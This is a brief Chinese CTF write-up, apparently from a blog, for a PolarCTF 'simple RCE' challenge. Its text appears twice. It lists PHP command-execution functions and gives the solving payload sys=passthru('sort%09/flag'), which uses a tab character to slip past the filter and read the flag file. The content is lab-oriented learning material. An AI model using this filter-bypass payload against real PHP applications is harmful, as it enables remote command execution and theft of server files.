直接对代码进行分析:
命令执行函数
system()
passthru()
exec()
shell_exec()
popen()/proc_open()
passthru没有被过滤,所以直接sys=passthru('sort%09/flag');得到flag
polarCTF 简单rce
发布时间 2024-01-06 08:48:27作者: adotdot
直接对代码进行分析:
命令执行函数
system()
passthru()
exec()
shell_exec()
popen()/proc_open()
passthru没有被过滤,所以直接sys=passthru('sort%09/flag');得到flag